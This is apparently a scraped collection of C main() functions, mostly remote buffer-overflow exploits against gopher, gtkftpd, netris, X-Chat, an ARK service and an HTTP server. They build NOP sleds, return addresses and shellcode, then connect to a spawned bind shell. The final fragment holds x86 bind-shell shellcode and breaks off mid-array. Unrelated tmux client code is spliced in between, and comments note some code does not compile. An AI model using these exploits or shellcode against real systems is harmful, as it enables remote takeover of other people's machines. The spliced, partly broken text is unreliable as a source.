/* begin. */
/*
 * Entry point. argv[1] is the port to listen on; optional argv[2] is the
 * port patched into the shellcode bytes. Names used but not visible in
 * this block: DFL_BINDSHELL_PORT, x86_exec[], REPLACE_VI_ADDR, RET_ADDR,
 * PLACEMENT_OFFSET, gopherd_bind(), getshell().
 */
int main(int argc,char **argv){
unsigned short port=0,sport=DFL_BINDSHELL_PORT;
char *hostptr;
printf("[*] gopher[v3.0.9+]: remote (client) buffer overflow exp"
"loit.\n[*] by: vade79/v9 [email protected] (fakehalo/realhalo)\n\n");
if(argc<2){
printf("[!] syntax: %s <port> [bindshell port]\n",argv[0]);
exit(1);
}
/* atoi() performs no validation: non-numeric text yields 0 and the int
   result is truncated when stored into an unsigned short. */
port=atoi(argv[1]);
if(argc>2)sport=atoi(argv[2]);

/* set the port to bind to in the shellcode. */
/* x86_exec[] is a global byte array declared elsewhere; bytes 20/21 hold
   the port in network (big-endian) byte order. */
x86_exec[20]=(sport&0xff00)>>8;
x86_exec[21]=(sport&0x00ff);

/* verbose values display. */
printf("[*] replacement \"vi\" address\t\t: 0x%.8x\n",REPLACE_VI_ADDR);
printf("[*] return address\t\t\t: 0x%.8x\n",RET_ADDR);
printf("[*] offset from the end of tmpstr[]\t: %d (=%d)\n",
PLACEMENT_OFFSET,PLACEMENT_OFFSET*4);
printf("[*] server port\t\t\t\t: %u\n",port);
printf("[*] bindshell port\t\t\t: %u\n\n",sport);

/* wait for a connection and send overflow. */
/* The returned pointer is passed on without a NULL check; whether
   gopherd_bind() can return NULL is not visible from this block. */
hostptr=gopherd_bind(port);

/* be safe, and give it time to run. */
sleep(3);

/* see if a shell spawned. */
getshell(hostptr,sport);

exit(0);
}
/*
 * ftp_parse: drives a scripted FTP session on an already-connected socket.
 * Reads the globals user, pass, writedir, basedir, attempts, reverse and
 * baseaddr, and calls ftp_read(), ftp_printf(), getbdir(), getdir(),
 * getcode(), getshell() and ftp_clean(), all declared elsewhere. Every
 * ftp_read() result is discarded, so server replies are never checked.
 * The socket is closed before returning.
 */
void ftp_parse(int sock){
 unsigned int offset=0;
 ftp_read(sock); /* get the banner. */
 /* user/pass/writedir are globals; each is interpolated into a command
    line with %s, with no escaping of CR/LF. */
 ftp_printf(sock,"USER %s\r\n",user);
 ftp_read(sock);
 ftp_printf(sock,"PASS %s\r\n",pass);
 ftp_read(sock);
 ftp_printf(sock,"CWD %s\r\n",writedir);
 ftp_read(sock);
 basedir=getbdir(); /* tmp dir of our own to use. */
 ftp_printf(sock,"MKD %s\r\n",basedir);
 ftp_read(sock);
 ftp_printf(sock,"CWD %s\r\n",basedir);
 ftp_read(sock);
 /* offset is unsigned; the type of the global `attempts` is not visible
    here, so the comparison may mix signed and unsigned operands. */
 while(offset<(attempts*400)){ /* if it hasn't yet, it's not going to. */
  /* slight null-byte/CR check, only needs to check the last byte. */
  /* Only the least-significant byte of the candidate value is tested,
     for 0x00 and '\n'; `reverse` selects subtraction or addition. */
  if((!reverse&&!((baseaddr-offset)&0xff))||(reverse&&!((baseaddr+offset)
  &0xff))||(!reverse&&((baseaddr-offset)&0xff)=='\n')||(reverse&&
  ((baseaddr+offset)&0xff)=='\n')){
   printf("[!] brute address contains null-byte/CR, increasing offset "
   "by one byte.\n");
   offset++; /* one byte off if reversed won't hurt here. (401) */
  }
  /* make the evil oversized directory. (255 or less bytes) */
  ftp_printf(sock,"MKD %s\r\n",getdir(offset));
  ftp_read(sock);
  /* date+directory exceeds 256 byte buffer, the exploit. */
  sleep(1); /* delay insurance. */
  ftp_printf(sock,"LIST -%s\r\n",getcode());
  /* nothing to read here, and gtkftpd processes (the exploit) */
  /* before the ftp list connection is made, making it */
  /* pointless to view the list. */
  sleep(1); /* delay insurance, again, just to be sure. */
  /* delete directory, multiples will cause failure(s). */
  ftp_printf(sock,"RMD %s\r\n",getdir(offset));
  ftp_read(sock);
  /* getshell() evidently returns on failure, since the loop continues. */
  getshell(sock,offset);
  offset+=400; /* always at least 400 nops in a row, in shellcode. */
 }
 ftp_clean(sock);
 close(sock);
 return;
}
/*
 * Entry point. argv[1] is either a host name or "-b" (listen instead of
 * connecting); optional argv[2] overrides the port, default DFLPORT.
 * Uses netris_bind(), netris_connect() and getshell() declared elsewhere.
 */
int main(int argc,char **argv){
 unsigned short isbind=0,nport=DFLPORT; /* default. */
 char *hostptr;
 printf("[*] netris[v0.5-]: client/server remote buffer overflow ex"
 "ploit.\n[*] by: vade79/v9 [email protected] (fakehalo)\n\n");
 if(argc<2){
  printf("[!] syntax: %s <host|-b> [port]\n",argv[0]);
  exit(1);
 }
 if(!strcmp(argv[1],"-b"))
  isbind=1;
 /* atoi(): no validation; non-numeric text gives 0, and the int result is
    truncated to unsigned short. */
 if(argc>2)
  nport=atoi(argv[2]);
 if(isbind)
  hostptr=netris_bind(nport);
 else
  /* hostptr is assigned inside the argument list. */
  netris_connect((hostptr=argv[1]),nport);
 sleep(1);
 /* The port is a fixed constant (per the original comment), so argv[2]
    does not influence it. */
 getshell(hostptr,45295); /* defined in shellcode. */
 exit(0);
}
/*
 * Entry point. argv[1] is an offset subtracted from BSEADDR; optional
 * argv[2]/argv[3] override the listen port and the port patched into the
 * shellcode. Names from elsewhere: DFLPORT, DFLSPRT, BSEADDR, BUFSIZE,
 * printe(), x86_exec[], socks5_bind(), getshell().
 */
int main(int argc,char **argv){
 unsigned short port=DFLPORT,sport=DFLSPRT;
 unsigned int retaddr=BSEADDR;
 char *hostptr;
 /* The condition rejects BUFSIZE < 0 or > 255, but the message says 1-255:
    BUFSIZE == 0 passes this check. printe() is assumed to exit on the
    non-zero second argument. */
 if(BUFSIZE<0||BUFSIZE>255)printe("BUFSIZE must be 1-255(char/int8).",1);
 printf("[*] X-Chat[v1.8.0-v2.0.8]: socks-5 remote buffer overflow exp"
 "loit.\n[*] by: by: vade79/v9 v9 fakehalo deadpig org (fakehalo)\n\n");
 if(argc<2){
  printf("[!] syntax: %s <offset from 0x%.8x> [port] [shell port]\n\n",
  argv[0],BSEADDR);
  exit(1);
 }
 /* argc>1 is always true here (argc<2 exited above). The int from atoi()
    is converted to unsigned for the subtraction, so it wraps rather than
    overflowing. */
 if(argc>1)retaddr-=atoi(argv[1]);
 if(argc>2)port=atoi(argv[2]);
 if(argc>3)sport=atoi(argv[3]);
 /* x86_exec[] is a global byte array; bytes 20/21 receive the port in
    network byte order. */
 x86_exec[20]=(sport&0xff00)>>8;
 x86_exec[21]=(sport&0x00ff);
 printf("[*] eip: 0x%.8x, socks-5 port: %u, bindshell port: %u.\n",
 retaddr,port,sport);
 /* Return value is used without a NULL check; whether socks5_bind() can
    return NULL is not visible here. */
 hostptr=socks5_bind(port,retaddr);
 sleep(1);
 getshell(hostptr,sport);
 exit(0);
}
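/*
 * Client entry point.
 *
 * Parses the command line into the IDENTIFY_* client flags (colour
 * depth, UTF-8, control mode, login shell), initialises the global
 * environment and the server/session/window option trees, locates the
 * configuration file and the server socket path, and then hands control
 * to client_main().
 *
 * argc/argv: as supplied by the C runtime; after option processing the
 * remaining words are passed to client_main() as the command to run.
 * Never returns normally: exits with client_main()'s status, 0 after -V,
 * or 1 if the socket path cannot be created or does not fit socket_path.
 */
int
main(int argc, char **argv)
{
	struct passwd	*pw;
	char		*s, *path, *label, *home, **var;
	int	 	 opt, flags, quiet, keys;

#if defined(DEBUG) && defined(__OpenBSD__)
	malloc_options = (char *) "AFGJPX";
#endif

	flags = IDENTIFY_256COLOURS | IDENTIFY_UTF8;
	quiet = 0;
	label = path = NULL;
	/* A leading '-' in argv[0] means we were invoked as a login shell. */
	login_shell = (**argv == '-');
	while ((opt = getopt(argc, argv, "28c:Cdf:lL:qS:uUvV")) != -1) {
		switch (opt) {
		case '2':
			/* 256- and 88-colour modes are mutually exclusive. */
			flags |= IDENTIFY_256COLOURS;
			flags &= ~IDENTIFY_88COLOURS;
			break;
		case '8':
			flags |= IDENTIFY_88COLOURS;
			flags &= ~IDENTIFY_256COLOURS;
			break;
		case 'c':
			free(shell_cmd);
			shell_cmd = xstrdup(optarg);
			break;
		case 'C':
			/* A second -C additionally requests termios mode. */
			if (flags & IDENTIFY_CONTROL)
				flags |= IDENTIFY_TERMIOS;
			else
				flags |= IDENTIFY_CONTROL;
			break;
		case 'V':
			printf("%s %s\n", __progname, VERSION);
			exit(0);
		case 'f':
			free(cfg_file);
			cfg_file = xstrdup(optarg);
			break;
		case 'l':
			login_shell = 1;
			break;
		case 'L':
			free(label);
			label = xstrdup(optarg);
			break;
		case 'q':
			quiet = 1;
			break;
		case 'S':
			free(path);
			path = xstrdup(optarg);
			break;
		case 'u':
			flags |= IDENTIFY_UTF8;
			break;
		case 'v':
			debug_level++;
			break;
		default:
			usage();
		}
	}
	argc -= optind;
	argv += optind;

	/* -c and a command on the command line are mutually exclusive. */
	if (shell_cmd != NULL && argc != 0)
		usage();

	/*
	 * NOTE(review): flags starts with IDENTIFY_UTF8 set and nothing above
	 * clears it, so this branch is not entered as written (unless
	 * IDENTIFY_UTF8 expands to 0). Kept unchanged.
	 */
	if (!(flags & IDENTIFY_UTF8)) {
		/*
		 * If the user has set whichever of LC_ALL, LC_CTYPE or LANG
		 * exist (in that order) to contain UTF-8, it is a safe
		 * assumption that either they are using a UTF-8 terminal, or
		 * if not they know that output from UTF-8-capable programs may
		 * be wrong.
		 */
		if ((s = getenv("LC_ALL")) == NULL || *s == '\0') {
			if ((s = getenv("LC_CTYPE")) == NULL || *s == '\0')
				s = getenv("LANG");
		}
		if (s != NULL && (strcasestr(s, "UTF-8") != NULL ||
		    strcasestr(s, "UTF8") != NULL))
			flags |= IDENTIFY_UTF8;
	}

	/* Copy the process environment into the global environment. */
	environ_init(&global_environ);
	for (var = environ; *var != NULL; var++)
		environ_put(&global_environ, *var);

	options_init(&global_options, NULL);
	options_table_populate_tree(server_options_table, &global_options);
	options_set_number(&global_options, "quiet", quiet);

	options_init(&global_s_options, NULL);
	options_table_populate_tree(session_options_table, &global_s_options);
	options_set_string(&global_s_options, "default-shell", "%s", getshell());

	options_init(&global_w_options, NULL);
	options_table_populate_tree(window_options_table, &global_w_options);

	/* Enable UTF-8 if the first client is on UTF-8 terminal. */
	if (flags & IDENTIFY_UTF8) {
		options_set_number(&global_s_options, "status-utf8", 1);
		options_set_number(&global_s_options, "mouse-utf8", 1);
		options_set_number(&global_w_options, "utf8", 1);
	}

	/* Override keys to vi if VISUAL or EDITOR are set. */
	if ((s = getenv("VISUAL")) != NULL || (s = getenv("EDITOR")) != NULL) {
		/* Only the basename of the editor is inspected. */
		if (strrchr(s, '/') != NULL)
			s = strrchr(s, '/') + 1;
		if (strstr(s, "vi") != NULL)
			keys = MODEKEY_VI;
		else
			keys = MODEKEY_EMACS;
		options_set_number(&global_s_options, "status-keys", keys);
		options_set_number(&global_w_options, "mode-keys", keys);
	}

	/* Locate the configuration file. */
	if (cfg_file == NULL) {
		home = getenv("HOME");
		if (home == NULL || *home == '\0') {
			pw = getpwuid(getuid());
			if (pw != NULL)
				home = pw->pw_dir;
		}
		/*
		 * With neither $HOME nor a passwd entry there is no default
		 * configuration file to look for; formatting a NULL home
		 * with %s would be undefined behaviour.
		 */
		if (home != NULL) {
			xasprintf(&cfg_file, "%s/%s", home, DEFAULT_CFG);
			if (access(cfg_file, R_OK) != 0 && errno == ENOENT) {
				free(cfg_file);
				cfg_file = NULL;
			}
		}
	}

	/*
	 * Figure out the socket path. If specified on the command-line with -S
	 * or -L, use it, otherwise try $TMUX or assume -L default.
	 */
	parseenvironment();
	if (path == NULL) {
		/* If no -L, use the environment. */
		if (label == NULL) {
			if (environ_path != NULL)
				path = xstrdup(environ_path);
		}

		/* -L or default set. */
		if (!path) {
			if ((path = makesocketpath(label)) == NULL) {
				fprintf(stderr, "can't create socket\n");
				exit(1);
			}
		}
	}
	free(label);
	/*
	 * A silently truncated socket path would make the client talk to a
	 * different socket than the one asked for; refuse instead.
	 */
	if (strlcpy(socket_path, path, sizeof socket_path) >=
	    sizeof socket_path) {
		fprintf(stderr, "socket path too long: %s\n", path);
		exit(1);
	}
	free(path);

#ifdef HAVE_SETPROCTITLE
	/* Set process title. */
	setproctitle("%s (%s)", __progname, socket_path);
#endif

	/* Pass control to the client. */
	ev_base = osdep_event_init();
	exit(client_main(argc, argv, flags));
}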
/*
 * Client entry point: parse the command line into the CLIENT_* flags,
 * initialise the global hooks, environment and option trees, resolve the
 * server socket path (-S, -L, $TMUX or the default label) and hand over
 * to client_main(). Exits with client_main()'s status; -V prints the
 * version and exits 0; a socket path that cannot be built exits 1.
 */
int
main(int argc, char **argv)
{
	static const char *const	 locale_vars[] =
	    { "LC_ALL", "LC_CTYPE", "LANG" };
	char				*path = NULL, *label = NULL;
	char				*shellcmd = NULL, **envp, cwd[PATH_MAX];
	const char			*env, *value, *base;
	int				 ch, flags, modekeys;
	size_t				 i;

#if defined(DEBUG) && defined(__OpenBSD__)
	malloc_options = (char *) "AFGJPX";
#endif

	setlocale(LC_TIME, "");
	tzset();

	/* A leading '-' in argv[0] means we were started as a login shell. */
	flags = (**argv == '-') ? CLIENT_LOGIN : 0;

#ifdef TMATE
	tmate_catch_sigsegv();
	flags |= CLIENT_256COLOURS | CLIENT_UTF8;
#endif

	while ((ch = getopt(argc, argv, "2c:Cdf:lL:qS:uUVv")) != -1) {
		switch (ch) {
		case 'V':
			printf("%s %s\n", __progname, VERSION);
			exit(0);
		case '2':
			flags |= CLIENT_256COLOURS;
			break;
		case 'u':
			flags |= CLIENT_UTF8;
			break;
		case 'l':
			flags |= CLIENT_LOGIN;
			break;
		case 'C':
			/* A second -C upgrades control mode to control-control. */
			flags |= (flags & CLIENT_CONTROL) ?
			    CLIENT_CONTROLCONTROL : CLIENT_CONTROL;
			break;
		case 'c':
			free(shellcmd);
			shellcmd = xstrdup(optarg);
			break;
		case 'f':
			set_cfg_file(optarg);
			break;
		case 'L':
			free(label);
			label = xstrdup(optarg);
			break;
		case 'S':
			free(path);
			path = xstrdup(optarg);
			break;
		case 'v':
			log_add_level();
			break;
		case 'q':
			/* Accepted but has no effect. */
			break;
		default:
			usage();
		}
	}
	argc -= optind;
	argv += optind;

	/* -c and a command given as arguments are mutually exclusive. */
	if (shellcmd != NULL && argc != 0)
		usage();

#ifdef __OpenBSD__
	if (pledge("stdio rpath wpath cpath flock fattr unix getpw sendfd "
	    "recvfd proc exec tty ps", NULL) != 0)
		err(1, "pledge");
#endif

	/*
	 * Inside tmux ($TMUX set) the terminal is UTF-8 by definition.
	 * Otherwise take the first non-empty of LC_ALL, LC_CTYPE and LANG
	 * and look for a UTF-8 marker in it: the user either has a UTF-8
	 * terminal or knows output from UTF-8-capable programs may be wrong.
	 */
	if (getenv("TMUX") != NULL)
		flags |= CLIENT_UTF8;
	else {
		env = "";
		for (i = 0; i < sizeof locale_vars / sizeof locale_vars[0]; i++) {
			value = getenv(locale_vars[i]);
			if (value != NULL && *value != '\0') {
				env = value;
				break;
			}
		}
		if (strcasestr(env, "UTF-8") != NULL ||
		    strcasestr(env, "UTF8") != NULL)
			flags |= CLIENT_UTF8;
	}

	global_hooks = hooks_create(NULL);

	/* Seed the global environment from the process environment. */
	global_environ = environ_create();
	for (envp = environ; *envp != NULL; envp++)
		environ_put(global_environ, *envp);
	if (getcwd(cwd, sizeof cwd) != NULL)
		environ_set(global_environ, "PWD", "%s", cwd);

	global_options = options_create(NULL);
	options_table_populate_tree(OPTIONS_TABLE_SERVER, global_options);

	global_s_options = options_create(NULL);
	options_table_populate_tree(OPTIONS_TABLE_SESSION, global_s_options);
	options_set_string(global_s_options, "default-shell", "%s", getshell());

	global_w_options = options_create(NULL);
	options_table_populate_tree(OPTIONS_TABLE_WINDOW, global_w_options);

	/* VISUAL, then EDITOR, selects vi or emacs key bindings. */
	env = getenv("VISUAL");
	if (env == NULL)
		env = getenv("EDITOR");
	if (env != NULL) {
		/* Only the basename of the editor is inspected. */
		base = strrchr(env, '/');
		if (base != NULL)
			env = base + 1;
		modekeys = (strstr(env, "vi") != NULL) ?
		    MODEKEY_VI : MODEKEY_EMACS;
		options_set_number(global_s_options, "status-keys", modekeys);
		options_set_number(global_w_options, "mode-keys", modekeys);
	}

	/*
	 * -S or -L win. Otherwise the socket path is the part of $TMUX
	 * before the first comma, and failing that make_label() builds the
	 * default.
	 */
	if (path == NULL && label == NULL) {
		env = getenv("TMUX");
		if (env != NULL && *env != '\0' && *env != ',') {
			path = xstrdup(env);
			path[strcspn(path, ",")] = '\0';
		}
	}
	if (path == NULL) {
		path = make_label(label);
		if (path == NULL) {
			fprintf(stderr, "can't create socket: %s\n",
			    strerror(errno));
			exit(1);
		}
	}
	socket_path = path;
	free(label);

	/* Pass control to the client. */
	exit(client_main(event_init(), argc, argv, flags, shellcmd));
}
/*
 * Entry point. argv[1] is the host, argv[2] a 1-based index into the
 * targets[] table (NUMTARGS entries). Names from elsewhere: usage(),
 * isock(), targets[], shellcode[], getshell(), and the constants LEN,
 * ARK_PORT, NOP_LEN, HEAD_LEN, SHELL_PORT.
 */
int main( int argc, char **argv)
{

	/* first 2 bytes are a type 74 request */
	/* last two bytes length */
	/* 8 bytes plus the implicit NUL; bytes 6-7 are overwritten below. */
	char 		head[] = "\x00\x4a\x00\x03\x00\x01\xff\xff";
	char 		data[512];
	char		sc_req[20000];
	char		*host;
	unsigned int		tnum;
	unsigned int 	safeaddr;
	unsigned int 	ret;
	int		datalen		= LEN;
	int		port		= ARK_PORT;
	unsigned int	addr		= 0;
	int		sock_overflow, sock_nops, sock_shell;
	int 		i;

	if (argc == 3)
	{
		host = argv[1];
		/* atoi() of a negative number converts to a large unsigned
		   value and is rejected by the range check below. */
		tnum = atoi(argv[2]);
		if (tnum > NUMTARGS || tnum == 0)
		{
			fprintf(stderr, "[!] Invalid target\n");
			/* usage() is assumed not to return; if it did, host and
			   tnum would be used uninitialised in the else path. */
			usage(argv[0]);
		}
	}
	else
	{
		usage(argv[0]);
	}
	
	tnum--;
	ret = targets[tnum].targret;
	safeaddr = targets[tnum].targsafe;

	/* These zero assignments are immediately overwritten by isock(). */
	sock_overflow = sock_nops = sock_shell = 0;
	sock_nops = isock(host, port);
	sock_overflow = isock(host, port);

	// build data section of overflow packet
	/* data[] holds 512 bytes; LEN is not visible here, so whether these
	   writes stay in bounds cannot be confirmed from this block. */
	memset(data, 0x90, datalen);
	for (i = 0; i < datalen; i += 4)
		memcpy(data+i, (char *)&ret, 4);
	// we overwrite a pointer that must be a valid address
	memcpy(data+datalen-12, (char *)&safeaddr, 4); 

	// build header of overflow packet
	/* ntohs() of a host value; the following memcpy takes the first two
	   bytes of the int, which presumably assumes a little-endian host. */
	datalen = ntohs(datalen);
	memcpy(head+6, (char *)&datalen, 2);

	// build invalid packet with nops+shellcode
	/* The extra byte written by memset is overwritten by the memcpy. */
	memset(sc_req, 0x90, NOP_LEN+1);
	memcpy(sc_req+NOP_LEN, shellcode, sizeof(shellcode));

	// send invalid nop+shellcode packet
	fprintf(stderr, "[*] Sending nops+shellcode\n");
	/* write() return values are not checked here or below. */
	write(sock_nops, sc_req, NOP_LEN+sizeof(shellcode)); 
	fprintf(stderr, "[*] Done, sleeping\n");
	sleep(1);
	close(sock_nops);

	// send overflow
	fprintf(stderr, "[*] Sending overflow\n");
	write(sock_overflow, head, HEAD_LEN);
	/* LEN (the untouched length) is used here, not the converted datalen. */
	write(sock_overflow, data, LEN);
	fprintf(stderr, "[*] Done\n");
	fprintf(stderr, "[*] Sleeping and connecting remote shell\n");
	sleep (1);
	close(sock_overflow);

	// connect to shell
	sock_shell = isock(host, SHELL_PORT);
	fprintf(stderr, "[*] Success, enjoy\n");
	getshell(sock_shell);

	/* No return statement: under C99 and later, reaching the end of
	   main() returns 0. */
}
File: tmux.c Project: Brijen/tmux
/*
 * Client entry point: parse the command line into the CLIENT_* flags,
 * initialise the global environment and option trees, resolve the server
 * socket path (-S, -L, $TMUX or the "default" label) into socket_path,
 * and hand over to client_main(). Exits with client_main()'s status; -V
 * prints the version and exits 0; a socket path that cannot be built or
 * that does not fit in socket_path exits 1.
 */
int
main(int argc, char **argv)
{
	static const char *const	 locale_vars[] =
	    { "LC_ALL", "LC_CTYPE", "LANG" };
	char	*env, *value, *base, *path = NULL, *label = NULL;
	char	**envp, cwd[PATH_MAX];
	int	 ch, flags, modekeys;
	size_t	 i;

#if defined(DEBUG) && defined(__OpenBSD__)
	malloc_options = (char *) "AFGJPX";
#endif

	setlocale(LC_TIME, "");

	/* A leading '-' in argv[0] means we were started as a login shell. */
	flags = (**argv == '-') ? CLIENT_LOGIN : 0;

	while ((ch = getopt(argc, argv, "2c:Cdf:lL:qS:uUVv")) != -1) {
		switch (ch) {
		case 'V':
			printf("%s %s\n", __progname, VERSION);
			exit(0);
		case '2':
			flags |= CLIENT_256COLOURS;
			break;
		case 'u':
			flags |= CLIENT_UTF8;
			break;
		case 'l':
			flags |= CLIENT_LOGIN;
			break;
		case 'C':
			/* A second -C upgrades control mode to control-control. */
			flags |= (flags & CLIENT_CONTROL) ?
			    CLIENT_CONTROLCONTROL : CLIENT_CONTROL;
			break;
		case 'c':
			free(shell_cmd);
			shell_cmd = xstrdup(optarg);
			break;
		case 'f':
			set_cfg_file(optarg);
			break;
		case 'L':
			free(label);
			label = xstrdup(optarg);
			break;
		case 'S':
			free(path);
			path = xstrdup(optarg);
			break;
		case 'v':
			debug_level++;
			break;
		case 'q':
			/* Accepted but has no effect. */
			break;
		default:
			usage();
		}
	}
	argc -= optind;
	argv += optind;

	/* -c and a command given as arguments are mutually exclusive. */
	if (shell_cmd != NULL && argc != 0)
		usage();

	/*
	 * Unless -u was given, take the first non-empty of LC_ALL, LC_CTYPE
	 * and LANG and look for a UTF-8 marker in it: the user either has a
	 * UTF-8 terminal or knows output from UTF-8-capable programs may be
	 * wrong.
	 */
	if (!(flags & CLIENT_UTF8)) {
		env = NULL;
		for (i = 0; i < sizeof locale_vars / sizeof locale_vars[0]; i++) {
			value = getenv(locale_vars[i]);
			if (value != NULL && *value != '\0') {
				env = value;
				break;
			}
		}
		if (env != NULL && (strcasestr(env, "UTF-8") != NULL ||
		    strcasestr(env, "UTF8") != NULL))
			flags |= CLIENT_UTF8;
	}

	/* Seed the global environment from the process environment. */
	environ_init(&global_environ);
	for (envp = environ; *envp != NULL; envp++)
		environ_put(&global_environ, *envp);
	if (getcwd(cwd, sizeof cwd) != NULL)
		environ_set(&global_environ, "PWD", cwd);

	options_init(&global_options, NULL);
	options_table_populate_tree(server_options_table, &global_options);

	options_init(&global_s_options, NULL);
	options_table_populate_tree(session_options_table, &global_s_options);
	options_set_string(&global_s_options, "default-shell", "%s",
	    getshell());

	options_init(&global_w_options, NULL);
	options_table_populate_tree(window_options_table, &global_w_options);

	/* Enable UTF-8 if the first client is on UTF-8 terminal. */
	if (flags & CLIENT_UTF8) {
		options_set_number(&global_s_options, "status-utf8", 1);
		options_set_number(&global_s_options, "mouse-utf8", 1);
		options_set_number(&global_w_options, "utf8", 1);
	}

	/* VISUAL, then EDITOR, selects vi or emacs key bindings. */
	env = getenv("VISUAL");
	if (env == NULL)
		env = getenv("EDITOR");
	if (env != NULL) {
		/* Only the basename of the editor is inspected. */
		base = strrchr(env, '/');
		if (base != NULL)
			env = base + 1;
		modekeys = (strstr(env, "vi") != NULL) ?
		    MODEKEY_VI : MODEKEY_EMACS;
		options_set_number(&global_s_options, "status-keys", modekeys);
		options_set_number(&global_w_options, "mode-keys", modekeys);
	}

	/*
	 * Figure out the socket path. -S wins outright. Without -L, the
	 * part of $TMUX before the first comma is used; if that is unset or
	 * empty the label falls back to "default". Any label is then turned
	 * into a path by makesocketpath().
	 */
	if (path == NULL) {
		if (label == NULL) {
			env = getenv("TMUX");
			if (env != NULL) {
				path = xstrdup(env);
				path[strcspn(path, ",")] = '\0';
			}
			if (path == NULL || *path == '\0') {
				free(path);
				path = NULL;
				label = xstrdup("default");
			}
		}
		if (label != NULL) {
			path = makesocketpath(label);
			if (path == NULL) {
				fprintf(stderr, "can't create socket: %s\n",
				    strerror(errno));
				exit(1);
			}
		}
	}
	free(label);

	/* Refuse a path that would be silently truncated. */
	if (strlcpy(socket_path, path, sizeof socket_path) >=
	    sizeof socket_path) {
		fprintf(stderr, "socket path too long: %s\n", path);
		exit(1);
	}
	free(path);

#ifdef HAVE_SETPROCTITLE
	/* Set process title. */
	setproctitle("%s (%s)", __progname, socket_path);
#endif

	/* Pass control to the client. */
	exit(client_main(event_init(), argc, argv, flags));
}
/*
 * Entry point. Options: -t/-T target index, -h/-H host, -p/-P port,
 * -i/-I hint, -? usage. Names from elsewhere: D_PORT, D_HOST, BUFSIZE,
 * BUFSIZE2, BUFSIZE3, __pl_form[], shell[], banrl(), x_fp_rm_usage(),
 * sock_connect(), getshell(). Blank lines between statements are as
 * pasted on the page.
 */
int main(int argc,char *argv[])

{

int port=D_PORT;

/* D_HOST must expand to a string literal for this initialiser. */
char hostname[0x333]=D_HOST;

int whlp,type=0;

/* i is never used. */
unsigned int i=0;

char buf[BUFSIZE+1];
char buf2[BUFSIZE2+1];
char sendbuf[BUFSIZE3+1];
int sd;

/* __pl_form is a reserved identifier (double underscore). */
u_long retaddr=__pl_form[type].retaddr;



(void)banrl();

/* getopt() returns -1 at the end; EOF is -1 on typical platforms. */
while((whlp=getopt(argc,argv,"T:t:H:h:P:p:IiXx"))!=EOF)

{

extern char *optarg;

switch(whlp)

{

case 'T':

case 't':

/* Only the upper bound is checked: a negative atoi() result passes
   `<6` and indexes __pl_form[] with a negative subscript. */
if((type=atoi(optarg))<6)

{

retaddr=__pl_form[type].retaddr;

}

else (void)x_fp_rm_usage(argv[0]);

break;





case 'H':

case 'h':

/* Zero-filled first and copied with sizeof-1, so the result is always
   NUL-terminated. */
memset((char *)hostname,0,sizeof(hostname));

strncpy(hostname,optarg,sizeof(hostname)-1);

break;



case 'P':

case 'p':

port=atoi(optarg);

break;



case 'I':

case 'i':

fprintf(stderr," Try `%s -?' for more information.\n\n",argv[0]);

exit(-1);



case '?':

(void)x_fp_rm_usage(argv[0]);

break;

}

}



/* x_fp_rm_usage() is assumed to exit; there is no `else`, so the
   following bare block runs in every case it returns from. */
if(!strcmp(hostname,D_HOST))

{

(void)x_fp_rm_usage(argv[0]);

}

{

fprintf(stdout," [+] Hostname: %s\n",hostname);

fprintf(stdout," [+] Port num: %d\n",port);

/* %p with a u_long argument is a format/argument type mismatch. */
fprintf(stdout," [+] Retaddr address: %p\n",retaddr);

}



fprintf(stdout," [1] #1 Set  codes.\n");




 memset(buf, 0x90, BUFSIZE);


 /* buf[BUFSIZE] is never written, so buf is not NUL-terminated; the %s
    below reads until it finds a zero byte on the stack. */
 memcpy(&buf[BUFSIZE-(sizeof(retaddr))], &retaddr, sizeof(retaddr));


 memset(buf2,0x90,88);

 memcpy(buf2+88,shell, sizeof(shell));

 /* NOTE(review): this string literal is broken across two source lines
    as pasted; as written it does not compile. The size 1024 is also
    unrelated to sizeof sendbuf (BUFSIZE3+1), which is not visible here. */
 snprintf(sendbuf,1024,"GET %s /HTTP/1.0\r\nUser-Agent: 
%s\r\n\r\n",buf,buf2);

 fprintf(stdout," [1] #1 Set socket.\n");

 sd=sock_connect(hostname,port);

fprintf(stdout," [1] #1 Send codes.\n");

 /* Writes BUFSIZE3 bytes regardless of the formatted length; the return
    value is not checked. */
 write(sd,sendbuf,BUFSIZE3);

 close(sd);
 sleep(1);
fprintf(stdout," [1] #3 Get shell.\n");
 getshell(hostname,26112);
 exit(0);

}
/*
 * Entry point. Options: -r/-R retloc, -s/-S retaddr (both via strtoul
 * base 0), -h/-H host, -p/-P port, -? usage. Names from elsewhere: PORT,
 * HOST, pl_form[], banrl(), usage(), setsock(), re_conenter(),
 * getshell().
 */
int main(int argc,char *argv[])
{
    int at_sock;
    int ts_sock;
    int port=PORT;
    int roup;
    char ttatk_code[36864];
    /* HOST must expand to a string literal for this initialiser. */
    char hostname[0x82]=HOST;
    char main_str[] = /* BIND SHELL ON PORT TCP/36864  */
		 //------------------- main: -------------------//
		 "\xeb\x72"                        /* jmp callz */
		 //------------------- start: ------------------//
		 "\x5e"                            /* popl %esi */
		 //------------------ socket() -----------------//
		 "\x29\xc0"                  /* subl %eax, %eax */
		 "\x89\x46\x10"        /* movl %eax, 0x10(%esi) */
		 "\x40"                            /* incl %eax */
		 "\x89\xc3"                  /* movl %eax, %ebx */
		 "\x89\x46\x0c"        /* movl %eax, 0x0c(%esi) */
		 "\x40"                            /* incl %eax */
		 "\x89\x46\x08"        /* movl %eax, 0x08(%esi) */
		 "\x8d\x4e\x08"        /* leal 0x08(%esi), %ecx */
		 "\xb0\x66"                  /* movb $0x66, %al */
		 "\xcd\x80"                        /* int $0x80 */
		 //------------------- bind() ------------------//
		 "\x43"                            /* incl %ebx */
		 "\xc6\x46\x10\x10"   /* movb $0x10, 0x10(%esi) */
		 "\x66\x89\x5e\x14"     /* movw %bx, 0x14(%esi) */
		 "\x88\x46\x08"         /* movb %al, 0x08(%esi) */
		 "\x29\xc0"                  /* subl %eax, %eax */
		 "\x89\xc2"                  /* movl %eax, %edx */
		 "\x89\x46\x18"        /* movl %eax, 0x18(%esi) */
		 "\xb0\x90"                  /* movb $0x90, %al */
		 "\x66\x89\x46\x16"     /* movw %ax, 0x16(%esi) */
		 "\x8d\x4e\x14"        /* leal 0x14(%esi), %ecx */
		 "\x89\x4e\x0c"        /* movl %ecx, 0x0c(%esi) */
		 "\x8d\x4e\x08"        /* leal 0x08(%esi), %ecx */
		 "\xb0\x66"                  /* movb $0x66, %al */
		 "\xcd\x80"                        /* int $0x80 */
		 //------------------ listen() -----------------//
		 "\x89\x5e\x0c"        /* movl %ebx, 0x0c(%esi) */
		 "\x43"                            /* incl %ebx */
